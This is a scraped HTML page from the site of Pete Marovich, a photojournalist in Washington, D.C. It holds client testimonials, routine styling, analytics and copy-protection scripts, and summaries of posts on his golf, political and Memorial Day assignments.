</br></br>– Jody Grober, super model, Roberts Camera</span>", "<span id='openquote' class='quotemark'>“</span><span id='quote'>There aren\'t many photographers who could deliver a unique image of one of the world\'s most photographed personalties, Tiger Woods. As the editor of Links Magazine, I assigned Pete Marovich that task and he delivered in a big way. He came through similarly on numerous other occasions for me as well. Pete is reliable, professional and a great ambassador for any publication he represents. He has great vision, and always plotted his course carefully prior to shooting. I would heartily support his application for assignments, and can\'t imagine he\'d produce anything but world-class images.</span><span id='closequote' class='quotemark'>”</span> <span id='quoteauthor'> </br></br>– Matt Sullivan, General Manager at Anglebrook Golf Club</span>", "<span id='openquote' class='quotemark'>“</span><span id='quote'>I\'ve been working with Pete for a few years now. Since day one, he has exceeded my expectations. He is always professional, reliable, and helpful. The quality of his photos speak for themselves, and he\'s a pleasure to work with. I highly recommend him to anyone looking for an incredibly talented multi-purpose photographer.</span><span id='closequote' class='quotemark'>”</span> <span id='quoteauthor'></br></br>– H. Catherine Woody</br>Vice President of Media and Industry Relations</br>Conference of State Bank Supervisors</span>", "<span id='openquote' class='quotemark'>“</span><span id='quote'>We trust Pete Marovich to photograph our high-level Washington events. He is a seasoned professional with a keen, journalistic eye, and he understands the need for quick turnaround.</span><span id='closequote' class='quotemark'>”</span> <span id='quoteauthor'></br></br>– Nancy Kelly Associate Director, Design and Production, Global Communications The Asia Foundation</span>", "<span id='openquote' class='quotemark'>“</span><span id='quote'>What I love about Pete’s work is that it reflects a level of wisdom and knowledge that he has accumulated over his years not only behind the lens, but his time as a picture editor and director of photography as well.</span><span id='closequote' class='quotemark'>”</span> <span id='quoteauthor'> </br></br>– Jose Lopez </br> Picture Editor Business/Financial News </br>The New York Times</span>", "<span id='openquote' class='quotemark'>“</span><span id='quote'>\'Pete is one of the few freelancers I can call and know that I will get exactly what I need for each assignment. Whether it\'s a hearing on Capitol Hill, sports or a portrait, Pete supplied McClatchy Tribune with top-notch photos. Often times I had to reach Pete at the last minute and more often than not (RARELY not!) he was able to come through with images for us. I highly recommend Pete for your DC photo needs.\' </span><span id='closequote' class='quotemark'>”</span> <span id='quoteauthor'> </br></br>– Linda Epstein </br> Senior Photo Editor </br>McClatchy-Tribune</span>", ], numQuotes: 8, fadeDuration: 1, fadeoutDuration: 1, delay: 5, quotesInit: function(){ if (this.numQuotes < 1){ document.getElementById('quoterotator').innerHTML="No Quotes Found"; } else { this.quoteRotate(); setInterval('quoteRotator.quoteRotate()', (this.fadeDuration + this.fadeoutDuration + this.delay) * 1000); } }, quoteRotate: function(){ jQuery('#quoterotator').hide().html(this.quotes[this.i - 1]).fadeIn(this.fadeDuration * 1000).css('filter','').delay(this.delay * 1000).fadeOut(this.fadeoutDuration * 1000); this.i = this.i % (this.numQuotes) + 1; } } </script> <style type='text/css'> #sidebar ul.photoshelter-gallery-widget, .photoshelter-gallery-widget {list-style:none;list-style-position:inside;margin:0 0 1em 0;padding:0;border:none} #sidebar ul.photoshelter-gallery-widget li, .photoshelter-gallery-widget li {display:block;margin:0;padding:0;background:none;border:none} #sidebar ul.photoshelter-gallery-widget li a img, .photoshelter-gallery-widget li a img {margin:0;padding:0;max-width:100%;height:auto} #sidebar ul.photoshelter-gallery-widget li a, .photoshelter-gallery-widget li a {background:none;border:none;padding:0} #sidebar ul.photoshelter-gallery-widget li a:hover, .photoshelter-gallery-widget li a:hover {background:none;} #sidebar ul.photoshelter-gallery-widget h6, .photoshelter-gallery-widget h6 {margin:1em 0;} #footer ul.photoshelter-gallery-widget h6 a {color:#999} #footer ul.photoshelter-gallery-widget h6 a:hover {color:#ccc} #sidebar ul.photoshelter-gallery-widget .imagecount, .photoshelter-gallery-widget .imagecount { text-align:right; font-style:italic; font-size:.9em; color:#ccc} .error {background: #FFF6BF; padding: 1em;} .error a {color:red} </style> <style type='text/css'> form#photoshelter {margin: 1em 0;} form#photoshelter input#s {margin-left:12px;margin-top:12px } form#photoshelter input#s:hover {cursor: pointer} </style> <!-- Google Webmaster Tools plugin for WordPress --> <meta name="google-site-verification" content="3gB8D36HpaQHHJpxRCCxNXayirORnXB-7MyHuSEkyVM" /> <script id="wpcp_disable_selection" type="text/javascript"> //<![CDATA[ var image_save_msg='You Can Not Save images!'; var no_menu_msg='Context Menu disabled!'; var smessage = "Content is protected !!"; function disableEnterKey(e) { if (e.ctrlKey){ var key; if(window.event) key = window.event.keyCode; //IE else key = e.which; //firefox (97) //if (key != 17) alert(key); if (key == 97 || key == 65 || key == 67 || key == 99 || key == 88 || key == 120 || key == 26 || key == 85 || key == 86 || key == 83 || key == 43) { show_wpcp_message('You are not allowed to copy content or view source'); return false; }else return true; } } function disable_copy(e) { var elemtype = e.target.nodeName; var isSafari = /Safari/.test(navigator.userAgent) && /Apple Computer/.test(navigator.vendor); elemtype = elemtype.toUpperCase(); var checker_IMG = ''; if (elemtype == "IMG" && checker_IMG == 'checked' && e.detail >= 2) {show_wpcp_message(alertMsg_IMG);return false;} if (elemtype != "TEXT" && elemtype != "TEXTAREA" && elemtype != "INPUT" && elemtype != "PASSWORD" && elemtype != "SELECT" && elemtype != "OPTION" && elemtype != "EMBED") { if (smessage !== "" && e.detail == 2) show_wpcp_message(smessage); if (isSafari) return true; else return false; } } function disable_copy_ie() { var elemtype = window.event.srcElement.nodeName; elemtype = elemtype.toUpperCase(); if (elemtype == "IMG") {show_wpcp_message(alertMsg_IMG);return false;} if (elemtype != "TEXT" && elemtype != "TEXTAREA" && elemtype != "INPUT" && elemtype != "PASSWORD" && elemtype != "SELECT" && elemtype != "OPTION" && elemtype != "EMBED") { //alert(navigator.userAgent.indexOf('MSIE')); //if (smessage !== "") show_wpcp_message(smessage); return false; } } function reEnable() { return true; } document.onkeydown = disableEnterKey; document.onselectstart = disable_copy_ie; if(navigator.userAgent.indexOf('MSIE')==-1) { document.onmousedown = disable_copy; document.onclick = reEnable; } function disableSelection(target) { //For IE This code will work if (typeof target.onselectstart!="undefined") target.onselectstart = disable_copy_ie; //For Firefox This code will work else if (typeof target.style.MozUserSelect!="undefined") {target.style.MozUserSelect="none";} //All other (ie: Opera) This code will work else target.onmousedown=function(){return false} target.style.cursor = "default"; } //Calling the JS function directly just after body load window.onload = function(){disableSelection(document.body);}; //]]> </script> <script id="wpcp_disable_Right_Click" type="text/javascript"> //<![CDATA[ document.ondragstart = function() { return false;} /* ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Disable context menu on images by GreenLava Version 1.0 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ */ function nocontext(e) { return false; } document.oncontextmenu = nocontext; //]]> </script> <style> .unselectable { -moz-user-select:none; -webkit-user-select:none; cursor: default; } html { -webkit-touch-callout: none; -webkit-user-select: none; -khtml-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; -webkit-tap-highlight-color: rgba(0,0,0,0); } </style> <script id="wpcp_css_disable_selection" type="text/javascript"> var e = document.getElementsByTagName('body')[0]; if(e) { e.setAttribute('unselectable',on); } </script> <!-- BeginHeader --><link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Raleway:400,200,300,100|Molengo" /><!-- EndHeader --> <meta name="ps_configurator" content="thmNm=Gridspace;thmVsn=1.4.5;thmFmly=gridspace;hd_bgn=BeginHeader;hd_end=EndHeader;ft_bgn=BeginFooter;ft_end=EndFooter;scptInc=https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js;scptInc=//html5shiv.googlecode.com/svn/trunk/html5.js;scptInc=http://www.petemarovichimages.com/wp-content/themes/gridspace/js/menu.js;lnkInc=http://www.petemarovichimages.com/wp-content/themes/gridspace/style.css;lnkInc=http://www.petemarovichimages.com/wp-content/themes/gridspace/css/default.css" /> <!-- Vipers Video Quicktags v6.6.0 | http://www.viper007bond.com/wordpress-plugins/vipers-video-quicktags/ --> <style type="text/css"> .vvqbox { display: block; max-width: 100%; visibility: visible !important; margin: 10px auto; } .vvqbox img { max-width: 100%; height: 100%; } .vvqbox object { max-width: 100%; } </style> <script type="text/javascript"> // <![CDATA[ var vvqflashvars = {}; var vvqparams = { wmode: "opaque", allowfullscreen: "true", allowscriptaccess: "always" }; var vvqattributes = {}; var vvqexpressinstall = "http://s4694.pcdn.co/wp-content/plugins/vipers-video-quicktags/resources/expressinstall.swf"; // ]]> </script> <!-- BeginHeader --><style type="text/css">h1, h2, h3, h4, h5, h6, ul.menu li a { font-family: 'Raleway'; }body, p, textarea, input, h2.site-description { font-family: 'Molengo'; }</style><!-- EndHeader --><style type="text/css" id="custom-background-css"> body.custom-background { background-color: #ffffff; } </style> <!-- BeginHeader --><style type="text/css">.side-by-side { float: left; margin-right: 5px } table.variations { border:0; } td.value { border:0; background-color:#fff; } /*Product Title*/ .woocommerce div.product .product_title, .woocommerce #content div.product .product_title, .woocommerce-page div.product .product_title, .woocommerce-page #content div.product .product_title { clear: none; margin-top: 2.4em; padding-bottom: 0; padding-left: ; padding-right: 0; padding-top: 0; } /*Padding Above Price*/ .woocommerce div.product div.summary,.woocommerce #content div.product div.summary,.woocommerce-page div.product div.summary,.woocommerce-page #content div.product div.summary { float:right; width:100%; margin-top:-1em; } /*Product Photo*/ .woocommerce div.product div.images,.woocommerce #content div.product div.images,.woocommerce-page div.product div.images,.woocommerce-page #content div.product div.images { float:left; width:65%; padding-right:2em; } /*Description Reviews*/ .woocommerce div.product div.summary,.woocommerce #content div.product div.summary,.woocommerce-page div.product div.summary,.woocommerce-page #content div.product div.summary { float:left; width:30%; margin-bottom:-1em; } /* Price*/ .woocommerce div.product span.price, .woocommerce div.product p.price, .woocommerce #content div.product span.price, .woocommerce #content div.product p.price, .woocommerce-page div.product span.price, .woocommerce-page div.product p.price, .woocommerce-page #content div.product span.price, .woocommerce-page #content div.product p.price { color: #85AD74; font-size: 2.25em; margin:0; } /*In Stock*/ .woocommerce div.product p.stock, .woocommerce #content div.product p.stock, .woocommerce-page div.product p.stock, .woocommerce-page #content div.product p.stock { font-size: 1.50em; margin:0; } .woocommerce div.product form.cart,.woocommerce #content div.product form.cart,.woocommerce-page div.product form.cart,.woocommerce-page #content div.product form.cart { margin-bottom:0em; } .woocommerce-message,.woocommerce-error,.woocommerce-info { padding:1em 1em 1em 3.5em; margin:0 0 2em; position:absolute; top:3em; -webkit-border-radius:4px; -moz-border-radius:4px; border-radius:4px background:#fcfbfc; background:-webkit-gradient(linear,left top,left bottom,from(#fcfbfc),to(#f7f6f7)); background:-webkit-linear-gradient(#fcfbfc,#f7f6f7); background:-moz-linear-gradient(center top,#fcfbfc 0%,#f7f6f7 100%); background:-moz-gradient(center top,#fcfbfc 0%,#f7f6f7 100%); color:#5e5e5e; text-shadow:0 1px 0 #ffffff; list-style:none outside; width:auto; -webkit-box-shadow:inset 0 -2px 6px rgba(0,0,0,0.05), inset 0 -2px 30px rgba(0,0,0,0.015), inset 0 1px 0 #fff, 0 1px 2px rgba(0,0,0,0.3); box-shadow:inset 0 -2px 6px rgba(0,0,0,0.05), inset 0 -2px 30px rgba(0,0,0,0.015), inset 0 1px 0 #fff, 0 1px 2px rgba(0,0,0,0.3)}.woocommerce-message:after,.woocommerce-error:after,.woocommerce-info:after{content:""; display:block; clear:both; } .woocommerce-message:before,.woocommerce-error:before,.woocommerce-info:before{ content:""height:1.5em; width:1.5em; display:block; position:absolute; top:3em; left:1em; font-family:sans-serif; font-size:1em; line-height:1.5; text-align:center; color:#fff; text-shadow:0 1px 0 rgba(0,0,0,0.2); padding-top:1em; -webkit-border-bottom-left-radius:4px; -webkit-border-bottom-right-radius:4px; -moz-border-radius-bottomleft:4px; -moz-border-radius-bottomright:4px; border-bottom-left-radius:4px; border-bottom-right-radius:4px; box-shadow:inset 0 -1px 0 0 rgba(0,0,0,0.1); -webkit-box-shadow:inset 0 -1px 0 0 rgba(0,0,0,0.1); -moz-box-shadow:inset 0 -1px 0 0 rgba(0,0,0,0.1)}.woocommerce-message .button,.woocommerce-error .button,.woocommerce-info .button{float:right}.woocommerce-message li,.woocommerce-error li,.woocommerce-info li{list-style:none outside; padding-left:0; margin-left:0 } .speciallink { text-decoration: underline; color: green; } h1.page-title, h1.entry-title {text-align:right;} #quotearea { background: url(images/wide-rounded.gif) center center no-repeat; width: 400px; height: 207px; padding: 0px 50px 0px 0px; margin: 15px auto; } #quoterotator { line-height: 135%; } #quoteauthor { display: block; text-align: right; font-weight: bold; font-style: italic; } #page { max-width: 1050px } #primary { width: 75%; } #secondary { width: 22%; }</style><!-- EndHeader --> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-45581735-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </head> <body lang="en" class="home blog custom-background unselectable single-author horizontal has-top-menu no-welcome-msg"> <!-- BeginHeader --> <div id="page" class="clearfix hfeed"> <header id="branding" role="banner"> <div class="menu-top-navigation-container"><ul id="menu-top-navigation" class="menu-top-menu secondary clearfix"><li id="menu-item-2467" class="facebook menu-item menu-item-type-custom menu-item-object-custom menu-item-2467"><a href="https://www.facebook.com/PeteMarovichImages?ref=hl">Facebook</a></li> <li id="menu-item-2483" class="twitter menu-item menu-item-type-custom menu-item-object-custom menu-item-2483"><a href="https://twitter.com/petemarovich">Twitter</a></li> </ul></div> <hgroup> <h1 id="site-title"> <a href="http://www.petemarovichimages.com/" title="Pete Marovich &#8211; Photojournalist and Political Photographer in Washington, DC" rel="home"> <img class="sitetitle" src="http://s4694.pcdn.co/wp-content/uploads/2015/05/Reversed-LOGO-for-WP1.jpg" alt="Pete Marovich &#8211; Photojournalist and Political Photographer in Washington, DC" /> </a> </h1> <center><h2 id="site-description">Dispatches from the Field</h2></center> </hgroup> <nav id="access" role="navigation"> <h1 class="assistive-text">Main menu</h1> <div class="skip-link screen-reader-text"><a href="#content" title="Skip to content">Skip to content</a></div> <div class="menu-my-main-container"><ul id="menu-my-main" class="menu clearfix"><li id="menu-item-2482" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2482"><a href="http://petemarovichimages.photoshelter.com">Portfolio</a></li> <li id="menu-item-2503" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2503"><a href="http://www.petemarovichimages.com/2013/06/12/fine-art-prints/">Fine Art Prints</a></li> <li id="menu-item-2479" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2479"><a href="http://www.petemarovichimages.com/about-2/">About Pete</a></li> <li id="menu-item-2481" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2481"><a href="http://www.petemarovichimages.com/newsletter-signup/">Newsletter Signup</a></li> <li id="menu-item-2480" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2480"><a href="http://www.petemarovichimages.com/faq/">FAQ</a></li> <li id="menu-item-2516" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2516"><a href="http://www.petemarovichimages.com/honors-and-awards/">Recognition</a></li> <li id="menu-item-3586" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3586"><a href="http://www.petemarovichimages.com/exhibitions-and-grants/">Exhibitions and Grants</a></li> </ul></div> </nav><!-- #access --> </header><!-- #branding --> <!-- EndHeader --> <section id="primary" class="clearfix"> <div id="controls"> </div> <div class="portfolios" style="display:none"> <article id="post-3615" class="portfolio post-3615 post type-post status-publish format-standard has-post-thumbnail hentry category-on-assignment category-recently-published category-sports tag-golf tag-pga-tour tag-photojournalism tag-photojournalist tag-sports tag-tiger-woods"> <div class="entry-content"> <a href="http://www.petemarovichimages.com/2018/07/02/stalking-tiger-2/" title="Permalink to Stalking Tiger" rel="bookmark" class="thumb"> <img title="Tiger Woods at the 2018 Quicken Loans National" data-image_large="http://s4694.pcdn.co/wp-content/uploads/2018/07/201806300196_15-1600x1065.jpg" data-image_thumb="http://s4694.pcdn.co/wp-content/uploads/2018/07/201806300196_15-768x570.jpg" class="aligncenter" srcset="http://s4694.pcdn.co/wp-content/uploads/2018/07/201806300196_15-768x570.jpg, http://s4694.pcdn.co/wp-content/uploads/2018/07/[email protected] 2x" /> </a> <div class="entry-text hide" style="display:none;"> <header class="entry-header"> <h2 class="entry-title"> <a href="http://www.petemarovichimages.com/2018/07/02/stalking-tiger-2/" title="Permalink to Stalking Tiger" rel="bookmark"> Stalking Tiger </a> </h2> <p class="entry-meta"> <a href="http://www.petemarovichimages.com/2018/07/02/stalking-tiger-2/" title="8:51 am" rel="bookmark"><time class="entry-date" datetime="2018-07-02T08:51:42-04:00" >July 2, 2018</time></a> <span class="fancy">by</span> <a href="http://www.petemarovichimages.com/author/pete-marovich/" title="Posts by Pete Marovich" rel="author">Pete Marovich</a> </p> </header><!-- .entry-header --> <div class="entry-summary" style="display:none;"> <p>I was on assignment for the Washington Post and also UPI this past week covering the Quicken Loans National golf tournament in Potomac, Maryland, near Washington, D.C. A large part of the week was chasing Tiger Woods around the golf course with heat in the mid-ninties and high humidity. It was pretty damn miserable. Tiger, [&hellip;]</p> <p class="entry-meta hide"> <span class="fancy"> Categories:</span> <a href="http://www.petemarovichimages.com/category/on-assignment/" rel="category tag">On Assignment</a>, <a href="http://www.petemarovichimages.com/category/recently-published/" rel="category tag">Recently Published</a>, <a href="http://www.petemarovichimages.com/category/sports/" rel="category tag">Sports</a> &bull; <span class="fancy">Tags: </span><a href="http://www.petemarovichimages.com/tag/golf/" rel="tag">Golf</a>, <a href="http://www.petemarovichimages.com/tag/pga-tour/" rel="tag">pga tour</a>, <a href="http://www.petemarovichimages.com/tag/photojournalism/" rel="tag">photojournalism</a>, <a href="http://www.petemarovichimages.com/tag/photojournalist/" rel="tag">photojournalist</a>, <a href="http://www.petemarovichimages.com/tag/sports/" rel="tag">Sports</a>, <a href="http://www.petemarovichimages.com/tag/tiger-woods/" rel="tag">Tiger Woods</a> </p> </div><!-- .entry-summary --> <footer class="entry-meta clearfix" style="display:none"> <div class="left"> </div> <div class="right"> <a href="http://www.petemarovichimages.com/2018/07/02/stalking-tiger-2/#respond" class="comments-link icon comment-bubble" >Leave a comment</a> <a id="like-3615" class="like-count icon heart_fill" href="#" > 0 </a> </div> </footer><!-- #entry-meta --> </div><!-- .entry-text --> </div><!-- .entry-content --> </article> <article id="post-3590" class="portfolio post-3590 post type-post status-publish format-standard has-post-thumbnail hentry category-on-assignment tag-conservative tag-demonstration tag-people tag-photojournalism tag-photojournalist tag-political-photography tag-politics tag-washington-d-c"> <div class="entry-content"> <a href="http://www.petemarovichimages.com/2018/02/24/cpac-2018/" title="Permalink to CPAC 2018" rel="bookmark" class="thumb"> <img title="CPAC 2018" data-image_large="http://s4694.pcdn.co/wp-content/uploads/2018/02/201802221771-1600x1067.jpg" data-image_thumb="http://s4694.pcdn.co/wp-content/uploads/2018/02/201802221771-768x570.jpg" class="aligncenter" srcset="http://s4694.pcdn.co/wp-content/uploads/2018/02/201802221771-768x570.jpg, http://s4694.pcdn.co/wp-content/uploads/2018/02/[email protected] 2x" /> </a> <div class="entry-text hide" style="display:none;"> <header class="entry-header"> <h2 class="entry-title"> <a href="http://www.petemarovichimages.com/2018/02/24/cpac-2018/" title="Permalink to CPAC 2018" rel="bookmark"> CPAC 2018 </a> </h2> <p class="entry-meta"> <a href="http://www.petemarovichimages.com/2018/02/24/cpac-2018/" title="9:02 am" rel="bookmark"><time class="entry-date" datetime="2018-02-24T09:02:03-04:00" >February 24, 2018</time></a> <span class="fancy">by</span> <a href="http://www.petemarovichimages.com/author/pete-marovich/" title="Posts by Pete Marovich" rel="author">Pete Marovich</a> </p> </header><!-- .entry-header --> <div class="entry-summary" style="display:none;"> <p>It has been quite a while since I have updated my personal site. I have been busy with a new photography collective that I formed last year with 5 other very talented photojournalists called American Reportage. For other updates on my work as well as the collective, please visit American Reportage. I covered the 2018 [&hellip;]</p> <p class="entry-meta hide"> <span class="fancy"> Categories:</span> <a href="http://www.petemarovichimages.com/category/on-assignment/" rel="category tag">On Assignment</a> &bull; <span class="fancy">Tags: </span><a href="http://www.petemarovichimages.com/tag/conservative/" rel="tag">Conservative</a>, <a href="http://www.petemarovichimages.com/tag/demonstration/" rel="tag">Demonstration</a>, <a href="http://www.petemarovichimages.com/tag/people/" rel="tag">People</a>, <a href="http://www.petemarovichimages.com/tag/photojournalism/" rel="tag">photojournalism</a>, <a href="http://www.petemarovichimages.com/tag/photojournalist/" rel="tag">photojournalist</a>, <a href="http://www.petemarovichimages.com/tag/political-photography/" rel="tag">political photography</a>, <a href="http://www.petemarovichimages.com/tag/politics/" rel="tag">Politics</a>, <a href="http://www.petemarovichimages.com/tag/washington-d-c/" rel="tag">washington d.c.</a> </p> </div><!-- .entry-summary --> <footer class="entry-meta clearfix" style="display:none"> <div class="left"> </div> <div class="right"> <a href="http://www.petemarovichimages.com/2018/02/24/cpac-2018/#respond" class="comments-link icon comment-bubble" >Leave a comment</a> <a id="like-3590" class="like-count icon heart_fill" href="#" > 0 </a> </div> </footer><!-- #entry-meta --> </div><!-- .entry-text --> </div><!-- .entry-content --> </article> <article id="post-3560" class="portfolio post-3560 post type-post status-publish format-standard has-post-thumbnail hentry category-on-assignment category-politics category-recently-published category-washington-dc tag-demonstration tag-photojournalism tag-photojournalist tag-political-photography tag-politics tag-protest tag-washington-d-c"> <div class="entry-content"> <a href="http://www.petemarovichimages.com/2017/01/22/womens-march-on-washington/" title="Permalink to Women&#8217;s March on Washington" rel="bookmark" class="thumb"> <img title="WOMENS MARCH" data-image_large="http://s4694.pcdn.co/wp-content/uploads/2017/01/201701210821-BW16-1600x1067.jpg" data-image_thumb="http://s4694.pcdn.co/wp-content/uploads/2017/01/201701210821-BW16-768x570.jpg" class="aligncenter" srcset="http://s4694.pcdn.co/wp-content/uploads/2017/01/201701210821-BW16-768x570.jpg, http://s4694.pcdn.co/wp-content/uploads/2017/01/[email protected] 2x" /> </a> <div class="entry-text hide" style="display:none;"> <header class="entry-header"> <h2 class="entry-title"> <a href="http://www.petemarovichimages.com/2017/01/22/womens-march-on-washington/" title="Permalink to Women&#8217;s March on Washington" rel="bookmark"> Women&#8217;s March on Washington </a> </h2> <p class="entry-meta"> <a href="http://www.petemarovichimages.com/2017/01/22/womens-march-on-washington/" title="5:43 pm" rel="bookmark"><time class="entry-date" datetime="2017-01-22T17:43:23-04:00" >January 22, 2017</time></a> <span class="fancy">by</span> <a href="http://www.petemarovichimages.com/author/pete-marovich/" title="Posts by Pete Marovich" rel="author">Pete Marovich</a> </p> </header><!-- .entry-header --> <div class="entry-summary" style="display:none;"> <p>After a 22 hour day covering the inauguration of President Trump, I picked up an assignment to cover the Women&#8217;s March on Washington for United Press International. And as everyone knows, I love a protest. I have never seen so many people at a protest. A couple of other colleagues of mine have also said [&hellip;]</p> <p class="entry-meta hide"> <span class="fancy"> Categories:</span> <a href="http://www.petemarovichimages.com/category/on-assignment/" rel="category tag">On Assignment</a>, <a href="http://www.petemarovichimages.com/category/politics/" rel="category tag">Politics</a>, <a href="http://www.petemarovichimages.com/category/recently-published/" rel="category tag">Recently Published</a>, <a href="http://www.petemarovichimages.com/category/washington-dc/" rel="category tag">Washington D.C.</a> &bull; <span class="fancy">Tags: </span><a href="http://www.petemarovichimages.com/tag/demonstration/" rel="tag">Demonstration</a>, <a href="http://www.petemarovichimages.com/tag/photojournalism/" rel="tag">photojournalism</a>, <a href="http://www.petemarovichimages.com/tag/photojournalist/" rel="tag">photojournalist</a>, <a href="http://www.petemarovichimages.com/tag/political-photography/" rel="tag">political photography</a>, <a href="http://www.petemarovichimages.com/tag/politics/" rel="tag">Politics</a>, <a href="http://www.petemarovichimages.com/tag/protest/" rel="tag">protest</a>, <a href="http://www.petemarovichimages.com/tag/washington-d-c/" rel="tag">washington d.c.</a> </p> </div><!-- .entry-summary --> <footer class="entry-meta clearfix" style="display:none"> <div class="left"> </div> <div class="right"> <a href="http://www.petemarovichimages.com/2017/01/22/womens-march-on-washington/#respond" class="comments-link icon comment-bubble" >Leave a comment</a> <a id="like-3560" class="like-count icon heart_fill" href="#" > 1 </a> </div> </footer><!-- #entry-meta --> </div><!-- .entry-text --> </div><!-- .entry-content --> </article> <article id="post-3535" class="portfolio post-3535 post type-post status-publish format-standard has-post-thumbnail hentry category-on-assignment category-politics category-recently-published category-washington-dc tag-capitol-hill tag-inauguration tag-photojournalism tag-photojournalist tag-political-photography tag-politics tag-president-trump tag-washington-d-c"> <div class="entry-content"> <a href="http://www.petemarovichimages.com/2017/01/22/inauguration-of-president-donald-trump/" title="Permalink to Inauguration of President Donald Trump" rel="bookmark" class="thumb"> <img title="Inauguration of President Donald Trump" data-image_large="http://s4694.pcdn.co/wp-content/uploads/2017/01/201701201243-BW-1600x1067.jpg" data-image_thumb="http://s4694.pcdn.co/wp-content/uploads/2017/01/201701201243-BW-768x570.jpg" class="aligncenter" srcset="http://s4694.pcdn.co/wp-content/uploads/2017/01/201701201243-BW-768x570.jpg, http://s4694.pcdn.co/wp-content/uploads/2017/01/[email protected] 2x" /> </a> <div class="entry-text hide" style="display:none;"> <header class="entry-header"> <h2 class="entry-title"> <a href="http://www.petemarovichimages.com/2017/01/22/inauguration-of-president-donald-trump/" title="Permalink to Inauguration of President Donald Trump" rel="bookmark"> Inauguration of President Donald Trump </a> </h2> <p class="entry-meta"> <a href="http://www.petemarovichimages.com/2017/01/22/inauguration-of-president-donald-trump/" title="3:34 pm" rel="bookmark"><time class="entry-date" datetime="2017-01-22T15:34:35-04:00" >January 22, 2017</time></a> <span class="fancy">by</span> <a href="http://www.petemarovichimages.com/author/pete-marovich/" title="Posts by Pete Marovich" rel="author">Pete Marovich</a> </p> </header><!-- .entry-header --> <div class="entry-summary" style="display:none;"> <p>Part of a team of 5 photographers, I was assigned by Bloomberg News to cover the National Mall during Donald Trump&#8217;s inauguration. This was my third inauguration. The other two were President Barack Obama&#8217;s 2009 and 2013. Here is a selection of images from the day.</p> <p class="entry-meta hide"> <span class="fancy"> Categories:</span> <a href="http://www.petemarovichimages.com/category/on-assignment/" rel="category tag">On Assignment</a>, <a href="http://www.petemarovichimages.com/category/politics/" rel="category tag">Politics</a>, <a href="http://www.petemarovichimages.com/category/recently-published/" rel="category tag">Recently Published</a>, <a href="http://www.petemarovichimages.com/category/washington-dc/" rel="category tag">Washington D.C.</a> &bull; <span class="fancy">Tags: </span><a href="http://www.petemarovichimages.com/tag/capitol-hill/" rel="tag">capitol Hill</a>, <a href="http://www.petemarovichimages.com/tag/inauguration/" rel="tag">inauguration</a>, <a href="http://www.petemarovichimages.com/tag/photojournalism/" rel="tag">photojournalism</a>, <a href="http://www.petemarovichimages.com/tag/photojournalist/" rel="tag">photojournalist</a>, <a href="http://www.petemarovichimages.com/tag/political-photography/" rel="tag">political photography</a>, <a href="http://www.petemarovichimages.com/tag/politics/" rel="tag">Politics</a>, <a href="http://www.petemarovichimages.com/tag/president-trump/" rel="tag">President Trump</a>, <a href="http://www.petemarovichimages.com/tag/washington-d-c/" rel="tag">washington d.c.</a> </p> </div><!-- .entry-summary --> <footer class="entry-meta clearfix" style="display:none"> <div class="left"> </div> <div class="right"> <a href="http://www.petemarovichimages.com/2017/01/22/inauguration-of-president-donald-trump/#comments" class="comments-link icon comment-bubble" >2</a> <a id="like-3535" class="like-count icon heart_fill" href="#" > 1 </a> </div> </footer><!-- #entry-meta --> </div><!-- .entry-text --> </div><!-- .entry-content --> </article> <article id="post-3515" class="portfolio post-3515 post type-post status-publish format-standard has-post-thumbnail hentry category-memorialday category-on-assignment category-recently-published category-washington-dc"> <div class="entry-content"> <a href="http://www.petemarovichimages.com/2016/05/30/3515/" title="Permalink to Memorial Day 2016" rel="bookmark" class="thumb"> <img title="MEMORIAL DAY" data-image_large="http://s4694.pcdn.co/wp-content/uploads/2016/05/201605300209-1600x1064.jpg" data-image_thumb="http://s4694.pcdn.co/wp-content/uploads/2016/05/201605300209-768x570.jpg" class="aligncenter" srcset="http://s4694.pcdn.co/wp-content/uploads/2016/05/201605300209-768x570.jpg, http://s4694.pcdn.co/wp-content/uploads/2016/05/[email protected] 2x" /> </a> <div class="entry-text hide" style="display:none;"> <header class="entry-header"> <h2 class="entry-title"> <a href="http://www.petemarovichimages.com/2016/05/30/3515/" title="Permalink to Memorial Day 2016" rel="bookmark"> Memorial Day 2016 </a> </h2> <p class="entry-meta"> <a href="http://www.petemarovichimages.com/2016/05/30/3515/" title="6:31 pm" rel="bookmark"><time class="entry-date" datetime="2016-05-30T18:31:56-04:00" >May 30, 2016</time></a> <span class="fancy">by</span> <a href="http://www.petemarovichimages.com/author/pete-marovich/" title="Posts by Pete Marovich" rel="author">Pete Marovich</a> </p> </header><!-- .entry-header --> <div class="entry-summary" style="display:none;"> <p>I first met Brittany Jacobs and her son Christian at Arlington National Cemetery on Memorial Day 2012. I had just made some images of her as she held her son tightly and wept at her husband&#8217;s headstone. It was their first Memorial Day visit to the gravesite since Sgt. Christopher J. Jacobs, 29, of Alcona, [&hellip;]</p> <p class="entry-meta hide"> <span class="fancy"> Categories:</span> <a href="http://www.petemarovichimages.com/category/memorialday/" rel="category tag">Memorial Day</a>, <a href="http://www.petemarovichimages.com/category/on-assignment/" rel="category tag">On Assignment</a>, <a href="http://www.petemarovichimages.com/category/recently-published/" rel="category tag">Recently Published</a>, <a href="http://www.petemarovichimages.com/category/washington-dc/" rel="category tag">Washington D.C.</a> </p> </div><!-- .entry-summary --> <footer class="entry-meta clearfix" style="display:none"> <div class="left"> </div> <div class="right"> <a href="http://www.petemarovichimages.com/2016/05/30/3515/#respond" class="comments-link icon comment-bubble" >Leave a 